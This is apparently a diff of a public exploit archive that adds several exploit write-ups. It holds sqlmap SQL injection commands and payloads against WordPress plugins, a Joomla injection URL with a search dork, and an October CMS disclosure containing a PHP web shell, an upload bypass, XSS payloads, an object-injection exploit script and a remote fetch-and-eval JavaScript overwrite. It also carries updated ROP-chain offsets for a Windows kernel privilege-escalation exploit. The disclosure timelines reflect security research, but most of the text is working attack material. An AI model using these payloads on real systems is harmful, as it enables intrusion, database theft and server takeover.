An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The get oarameter 'kc_ad' is vulnerable.
2. Proof of concept
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0"" —dbms —threads=10 —random-agent
OR
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql —level 5 —risk=3
Parameter: kc_ad (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kc_ad=31 AND 2281=2281&ver=2.0
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.2
6. Disclosure timeline
06-Mar-2017 - found the vulnerability
06-Mar-2017 - informed the developer
20-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.

50
platforms/php/webapps/41920.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Car Rental System v2.5
# Date: 28/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
Parameter: pickuploc (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
The same is applicable for 'dropoffloc' and 'car_type' parameters
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.5
6. Disclosure timeline
13-Mar-2017 - found the vulnerability
13-Mar-2017 - informed the developer
28-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.

47
platforms/php/webapps/41921.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Wow Viral Signups v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Viral Signups v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'idsignup' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=GING%40MAIL.RU&hvost=%3Fpage_id%3D47&idsignup=1" --dbs --threads=10 --random-agent --dbms mysql
Parameter: idsignup (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND 5272=5272
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.

51
platforms/php/webapps/41922.txt Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Wow Forms v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Forms v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'wowformid' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=send_mwp_form&arrkey%5B%5D=mwp-field-0&arrkey%5B%5D=mwp-forms-textarea-0&arrval%5B%5D=form2&arrval%5B%5D=rrr&mwpformid=1*" --dbs --threads=10 --random-agent --dbms mysql
Parameter: Array-like #6* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND 6968=6968
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))gxQa)
Type: UNION query
Title: Generic UNION query (NULL) - 65 columns
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x6b656f4d516d7a6b736f596f49746d4e776a7663716f4d41654c6e516e516c6c6c7a5274744a6d57,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL— -
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.

16
platforms/php/webapps/41930.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Joomla Component Myportfolio 3.0.2 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba Kazemi (Mojtaba MobhaM)
# Home : https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/myportfolio/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Google Dork : inurl:index.php?option=com_myportfolio
# Tested on: Linux
# Date: 2017-04-24
# POC :
# pid Parameter Vulnerable to SQL Injection
# http://www.Target.com/index.php?task=project&view=grid&id=1&pid=[SQL]&format=raw&option=com_myportfolio&Itemid=125
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

404
platforms/php/webapps/41936.txt Executable file
View file

@ -0,0 +1,404 @@
October CMS v1.0.412 several vulnerabilities
############################################
Information
===========
Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
management permission
CVE: pending
Credit: Anti Räis
HTML version: https://bitflipper.eu
Product
=======
October is a free, open-source, self-hosted CMS platform based on the
Laravel
PHP Framework.
Description
===========
October CMS build 412 contains several vulnerabilities. Some of them
allow an
attacker to execute PHP code on the server. Following issues have been
identified:
1. PHP upload protection bypass
2. Apache .htaccess upload
3. stored WCI in image name
4. reflected WCI while displaying project ID
5. PHP code execution via asset management
6. delete file via PHP object injection
7. asset save path modification
Proof of Concepts
=================
1. PHP upload protection bypass
-------------------------------
Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().
==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109 return [
110 // redacted
111 'php',
112 'php3',
113 'php4',
114 'phtml',
115 // redacted
116 ];
117 }
==================== source end ========================
We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g if we upload sh.php5 on the server:
==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
==================== source end ========================
Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd
2. Apache .htaccess upload
--------------------------
As described in the PHP upload protection bypass section, the
application uses
black-list based defense. It does not prevent the attacker from uploading a
.htaccess files which makes it exploitable on Apache servers. Attacker
can use
it to add another handler for PHP files and upload code under an alternative
name. Attacker has to first upload the .htaccess configuration file with
following settings:
==================== source start ========================
AddHandler application/x-httpd-php .z
==================== source end ========================
This will execute all .z files as PHP and after uploading a code named
sh.z to
the server. It can be used to execute code as described previously.
3. stored WCI in image name
---------------------------
Authenticated user, with permission to customize back-end settings, can
store
WCI payload in the image name. The functionality is located at:
Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
(edit name) -> (add title)
Set the name to following value:
==================== source start ========================
"><script>alert("stored WCI")</script x="
==================== source end ========================
Payload is executed when the victim clicks on the image name to edit it.
When the administrator edits user's profile image, attacker's payload is
executed, allowing him to execute JavaScript during administrator's active
session. This can be used, for example, to give another user a "super-user"
permission.
4. reflected WCI while displaying project ID
--------------------------------------------
Authenticated user with permission to manage software updates can "Attach
Project". When invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or write the payload in the input field,
then it
isn't easily exploitable.
==================== source start ========================
"><script>alert(1)</script x="
==================== source end ========================
5. PHP code execution via asset management
------------------------------------------
Authenticated user with permission to manage website assets, can use this
functionality to upload PHP code and execute it on the server.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
First, attacker creates a new asset test.js with the following content:
==================== source start ========================
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
==================== source end ========================
After saving the file, attacker renames it to test.php5 by clicking on ">_"
icon on the newly created file. Modal window opens which allows to specify a
new filename.
URL to execute PHP code:
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah
6. delete file via PHP object injection
---------------------------------------
Authenticated user with "Create, modify and delete CMS partials" or "Create,
modify and delete CMS layouts" can move assets to different folders. This
functionality is vulnerable to PHP object injection. User input is read from
selectedList parameter on line 11 and passed as argument to unserialize().
Unserialized array object is passed to validatePath() on line 32.
==================== source start ========================
1 <?php namespace Cms\Widgets;
2
3 class AssetList extends WidgetBase
4 {
5 // redacted
6
7 public function onMove()
8 {
9 $this->validateRequestTheme();
10
11 $selectedList = Input::get('selectedList');
12 if (!strlen($selectedList)) {
13 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
14 }
15
16 $destinationDir = Input::get('dest');
17 if (!strlen($destinationDir)) {
18 throw new ApplicationException(
Lang::get('cms::lang.asset.select_destination_dir'));
19 }
20
21 $destinationFullPath = $this->getFullPath($destinationDir);
22 if (!file_exists($destinationFullPath) ||
!is_dir($destinationFullPath)) {
23 throw new ApplicationException(
Lang::get('cms::lang.asset.destination_not_found'));
24 }
25
26 $list = @unserialize(@base64_decode($selectedList));
27 if ($list === false) {
28 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
29 }
30
31 foreach ($list as $path) {
32 if (!$this->validatePath($path)) {
33 throw new ApplicationException(
Lang::get('cms::lang.asset.invalid_path'));
34 }
35
36 // ...
==================== source end ========================
Following PHP exploit uses the vulnerability. It requires an authenticated
user's session to execute as described previously.
==================== source start ========================
<?php
class Swift_Mime_SimpleHeaderSet {}
class Swift_KeyCache_DiskKeyCache
{
private $_keys;
public function __construct($path, $filename) {
$this->_keys = [$path => [ $filename => null]];
}
}
class Swift_Mime_SimpleMimeEntity {
private $_headers;
private $_cache;
private $_cacheKey;
public function __construct($filename, $path = '') {
$this->_headers = new Swift_Mime_SimpleHeaderSet();
$this->_cache = new Swift_KeyCache_DiskKeyCache($path,
$filename);
$this->_cacheKey = $path;
}
}
function payload($filename) {
$builder = new Swift_Mime_SimpleMimeEntity($filename);
return base64_encode(serialize([$builder]));
}
function http($config) {
$ch = curl_init($config['url']);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
http_build_query($config['data']));
curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
return curl_exec($ch);
}
function get_config($url, $filename, $session) {
return [
'url' => $url.'/backend/cms',
'data' => [
'dest' => '/',
'theme' => 'demo',
'selectedList' => payload($filename),
],
'headers' => [
'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
'X-Requested-With: XMLHttpRequest',
],
'cookies' => 'admin_auth='.$session,
'proxy' => 'localhost:8080',
];
}
$url = 'http://victim.site';
$session = '<specify admin_auth cookie value here>';
$filename = '/tmp/target.txt';
echo http(get_config($url, $filename, $session));
==================== source end ========================
7. asset save path modification
-------------------------------
Authenticated user, with permission to manage website assets, can modify the
path the file is saved to. This allows an attacker to save css, js, less,
sass, scss files at different locations. Attacker can possibly use it to
execute JavaScript on the site, if the application tries to require an
file on
the server that does not exist or the attacker manages to delete the file
beforehand. When an attacker creates a new asset, then the following request
is made.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=test.js&content=test&templateType=asset&theme=demo
==================== request end ====================
The parameter fileName isn't validated and allows an attacker to specify an
path where the file should be saved to. Overwriting files is forbidden.
If we
specify the file name as ../../../test.js then we can assert that the
file is
created at the root of site's web directory.
We can execute JavaScript by combining this issue with file deletion
vulnerability via POI. For that, we are going to replace the
modules/backend/
assets/js/vendor/jquery.min.js file with our own content. It is loaded
on the
page for every authenticated user and allows us as an attacker to take
control
of their session. The payload for this example is the following:
==================== source start ========================
var c = new XMLHttpRequest();
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
c.onreadystatechange = () => eval(c.responseText);
c.send();
var h = () => {location.hash = 'Hacked: ' + (new Date())};
setInterval(h, 1000);
==================== source end ========================
After we delete the jquery.min.js file on the server, we create a new asset
with the payload as the content.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 371
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
var+c+%3d+new+XMLHttpRequest()%3b
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
c.send()%3b
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
setInterval(h,+1000)%3b
&templateType=asset&theme=demo
==================== request end ====================
After the victim authenticates, the payload is executed. For this
example, it
changes the URL hash every second, but can be used to take control of the
victims session.
Conclusion
==========
Authenticated user with permission to manage website assets, upload and
manage
media contents or customize back-end settings can use vulnerabilities found
there to execute PHP code on the server and take control of the application.
New release v1.0.413 has been made available as a result:
https://octobercms.com/support/article/rn-8
https://github.com/octobercms/october/releases/tag/v1.0.413.
Timeline
========
05.04.2017 | me > developer | first vulnerability discovered
06.04.2017 | me > developer | initial contact
07.04.2017 | me > developer | sent PoC
09.04.2017 | developer > me | developer implemented patches;
requested additional information
09.04.2017 | me > developer | sent PoC with additional information
and findings
10.04.2017 | developer > me | all issues were patched
11.04.2017 | developer > public | new release
11.04.2017 | me > DWF | CVE request
12.04.2017 | me > public | full disclosure
---
Anti Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com

0
platforms/windows/dos/41547.py → platforms/win_x86-64/dos/41547.py
View file

0
platforms/windows/local/41605.txt → platforms/win_x86-64/local/41605.txt
View file

147
platforms/win_x86-64/local/41722.c
View file

@ -4,7 +4,7 @@ Check these out:
- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
Tested on:
- Windows 10 Pro x64 (Post-Anniversary)
- ntoskrnl: 10.0.14393.693
- ntoskrnl.exe: 10.0.14393.953
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
*/
@ -63,7 +63,7 @@ struct bitmap_structure create_bitmaps(HACCEL hAccel[object_number]) {
char *worker_bitmap_memory;
HBITMAP manager_bitmap;
HBITMAP worker_bitmap;
int nWidth = 0x700;
int nWidth = 0x703;
int nHeight = 2;
unsigned int cPlanes = 1;
unsigned int cBitsPerPel = 8;
@ -170,7 +170,7 @@ HACCEL create_accelerator_table(HACCEL hAccel[object_number], int table_number)
LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG manager_pvScan_offset, ULONGLONG worker_pvScan_offset) {
HANDLE pid;
pid = GetCurrentProcess();
ULONGLONG rop_chain_address = 0x0000000048ff07da;
ULONGLONG rop_chain_address = 0x000000008aff07da;
LPVOID allocate_rop_chain;
allocate_rop_chain = VirtualAlloc((LPVOID*)rop_chain_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocate_rop_chain == NULL) {
@ -179,28 +179,28 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
}
/* <Null callback> */
ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret
ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret
ULONGLONG rop_02 = fortishield_callback;
ULONGLONG rop_03 = 0x0000000000000000; // NULL the callback
ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret
ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret
/* </Null callback> */
/* <Overwrite pvScan0> */
ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret
ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret
ULONGLONG rop_06 = (ULONGLONG)manager_pvScan_offset; // Manager BitMap pvScan0 offset
ULONGLONG rop_07 = (ULONGLONG)worker_pvScan_offset; // Worker BitMap pvScan0 offset
ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret
ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret
/* </Overwrite pvScan0> */
/* <Prepare RBX (to write the orignial stack pointer to> */
ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x155a; // pop rbx ; ret
ULONGLONG rop_10 = 0x000000004900007b;
ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x62c0c3; // pop rbx ; ret
ULONGLONG rop_10 = 0x000000008b0000e0;
/* </Prepare RBX (to write the orignial stack pointer to> */
/* <Get RSI value (points to the original stack) into RAX> */
ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x4551; // pop rax ; ret
ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x12eef4; // mov rax, rcx ; add rsp, 0x28 ; ret
ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x3dc8f; // mov rcx, rsi ; call rax
ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x6292eb; // pop rax ; ret
ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x556dc9; // mov rax, rcx ; add rsp, 0x28 ; ret
ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x4115ca; // mov rcx, rsi ; call rax
ULONGLONG rop_14 = 0x4141414141414141; // JUNK
ULONGLONG rop_15 = 0x4141414141414141; // JUNK
ULONGLONG rop_16 = 0x4141414141414141; // JUNK
@ -208,19 +208,19 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
/* </Get RSI value (points to the original stack) into RAX> */
/* <Adjust RAX to point to the return address pushed by the call> */
ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0xe37a; // pop rcx ; ret
ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0x61260f; // pop rcx ; ret
ULONGLONG rop_19 = 0x0000000000000028; // Get the return address
ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0x24752; // sub rax, rcx ; ret
ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0xd8c12; // sub rax, rcx ; ret
/* </Adjust RAX to point to the return address pushed by the call> */
/* <Overwrite the return from the call with fortishield_restore> */
ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0xe37a; // pop rcx ; ret
ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0x61260f; // pop rcx ; ret
ULONGLONG rop_22 = fortishield_restore;
ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret
ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret
/* </Overwrite the return from the call with fortishield_restore> */
/* <Write the original stack pointer on our usermode_stack> */
ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x400b2a; // mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret
ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x4cde3e; // mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret
ULONGLONG rop_25 = 0x4141414141414141; // JUNK
ULONGLONG rop_26 = 0x4141414141414141; // JUNK
ULONGLONG rop_27 = 0x4141414141414141; // JUNK
@ -229,43 +229,43 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
/* </Write the original stack pointer on our usermode_stack> */
/* <Restore stack pointer> */
ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x33b4; // pop rsp ; ret
ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x62b91b; // pop rsp ; ret
/* </Restore stack pointer> */
char *rop_chain;
DWORD rop_chain_size = 0x12000;
rop_chain = (char *)malloc(rop_chain_size);
memset(rop_chain, 0x00, rop_chain_size);
memcpy(rop_chain + 0xf7c1, &rop_01, 0x08);
memcpy(rop_chain + 0xf7c9, &rop_02, 0x08);
memcpy(rop_chain + 0xf7d1, &rop_03, 0x08);
memcpy(rop_chain + 0xf7d9, &rop_04, 0x08);
memcpy(rop_chain + 0xf7e1, &rop_05, 0x08);
memcpy(rop_chain + 0xf7e9, &rop_06, 0x08);
memcpy(rop_chain + 0xf7f1, &rop_07, 0x08);
memcpy(rop_chain + 0xf7f9, &rop_08, 0x08);
memcpy(rop_chain + 0xf801, &rop_09, 0x08);
memcpy(rop_chain + 0xf809, &rop_10, 0x08);
memcpy(rop_chain + 0xf811, &rop_11, 0x08);
memcpy(rop_chain + 0xf819, &rop_12, 0x08);
memcpy(rop_chain + 0xf821, &rop_13, 0x08);
memcpy(rop_chain + 0xf829, &rop_14, 0x08);
memcpy(rop_chain + 0xf831, &rop_15, 0x08);
memcpy(rop_chain + 0xf839, &rop_16, 0x08);
memcpy(rop_chain + 0xf841, &rop_17, 0x08);
memcpy(rop_chain + 0xf849, &rop_18, 0x08);
memcpy(rop_chain + 0xf851, &rop_19, 0x08);
memcpy(rop_chain + 0xf859, &rop_20, 0x08);
memcpy(rop_chain + 0xf861, &rop_21, 0x08);
memcpy(rop_chain + 0xf869, &rop_22, 0x08);
memcpy(rop_chain + 0xf871, &rop_23, 0x08);
memcpy(rop_chain + 0xf879, &rop_24, 0x08);
memcpy(rop_chain + 0xf881, &rop_25, 0x08);
memcpy(rop_chain + 0xf889, &rop_26, 0x08);
memcpy(rop_chain + 0xf891, &rop_27, 0x08);
memcpy(rop_chain + 0xf899, &rop_28, 0x08);
memcpy(rop_chain + 0xf8a1, &rop_29, 0x08);
memcpy(rop_chain + 0xf8a9, &rop_30, 0x08);
memset(rop_chain, 0x41, rop_chain_size);
memcpy(rop_chain + 0xf826, &rop_01, 0x08);
memcpy(rop_chain + 0xf82e, &rop_02, 0x08);
memcpy(rop_chain + 0xf836, &rop_03, 0x08);
memcpy(rop_chain + 0xf83e, &rop_04, 0x08);
memcpy(rop_chain + 0xf846, &rop_05, 0x08);
memcpy(rop_chain + 0xf84e, &rop_06, 0x08);
memcpy(rop_chain + 0xf856, &rop_07, 0x08);
memcpy(rop_chain + 0xf85e, &rop_08, 0x08);
memcpy(rop_chain + 0xf866, &rop_09, 0x08);
memcpy(rop_chain + 0xf86e, &rop_10, 0x08);
memcpy(rop_chain + 0xf876, &rop_11, 0x08);
memcpy(rop_chain + 0xf87e, &rop_12, 0x08);
memcpy(rop_chain + 0xf886, &rop_13, 0x08);
memcpy(rop_chain + 0xf88e, &rop_14, 0x08);
memcpy(rop_chain + 0xf896, &rop_15, 0x08);
memcpy(rop_chain + 0xf89e, &rop_16, 0x08);
memcpy(rop_chain + 0xf8a6, &rop_17, 0x08);
memcpy(rop_chain + 0xf8ae, &rop_18, 0x08);
memcpy(rop_chain + 0xf8b6, &rop_19, 0x08);
memcpy(rop_chain + 0xf8be, &rop_20, 0x08);
memcpy(rop_chain + 0xf8c6, &rop_21, 0x08);
memcpy(rop_chain + 0xf8ce, &rop_22, 0x08);
memcpy(rop_chain + 0xf8d6, &rop_23, 0x08);
memcpy(rop_chain + 0xf8de, &rop_24, 0x08);
memcpy(rop_chain + 0xf8e6, &rop_25, 0x08);
memcpy(rop_chain + 0xf8ee, &rop_26, 0x08);
memcpy(rop_chain + 0xf8f6, &rop_27, 0x08);
memcpy(rop_chain + 0xf8fe, &rop_28, 0x08);
memcpy(rop_chain + 0xf906, &rop_29, 0x08);
memcpy(rop_chain + 0xf90e, &rop_30, 0x08);
BOOL WPMresult;
SIZE_T written;
@ -282,7 +282,7 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result) {
HANDLE pid;
pid = GetCurrentProcess();
ULONGLONG shellcode_address = 0x0000000048ff07da;
ULONGLONG shellcode_address = 0x000000008aff07da;
LPVOID allocate_shellcode;
allocate_shellcode = VirtualAlloc((LPVOID*)shellcode_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocate_shellcode == NULL) {
@ -291,12 +291,12 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
}
/* <Overwrite PTE> */
ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret
ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret
ULONGLONG rop_02 = (ULONGLONG)pte_result; // PTE address
ULONGLONG rop_03 = 0x0000000000000063; // DIRTY + ACCESSED + R/W + PRESENT
ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x12e259; // mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret
ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x43d68; // wbinvd ; ret
ULONGLONG rop_06 = 0x000000004900081a; // shellcode
ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0x130779; // mov byte ptr [rax], cl ; mov rbx, qword ptr [rsp + 8] ; ret
ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0xc459c; // wbinvd ; ret
ULONGLONG rop_06 = 0x000000008b00081a; // shellcode
ULONGLONG rop_07 = fortishield_callback;
ULONGLONG rop_08 = fortishield_restore;
/* </Overwrite PTE> */
@ -351,14 +351,14 @@ LPVOID allocate_shellcode(LPVOID kernel_base, ULONGLONG fortishield_callback, UL
DWORD shellcode_size = 0x12000;
shellcode = (char *)malloc(shellcode_size);
memset(shellcode, 0x41, shellcode_size);
memcpy(shellcode + 0xf7c1, &rop_01, 0x08);
memcpy(shellcode + 0xf7c9, &rop_02, 0x08);
memcpy(shellcode + 0xf7d1, &rop_03, 0x08);
memcpy(shellcode + 0xf7d9, &rop_04, 0x08);
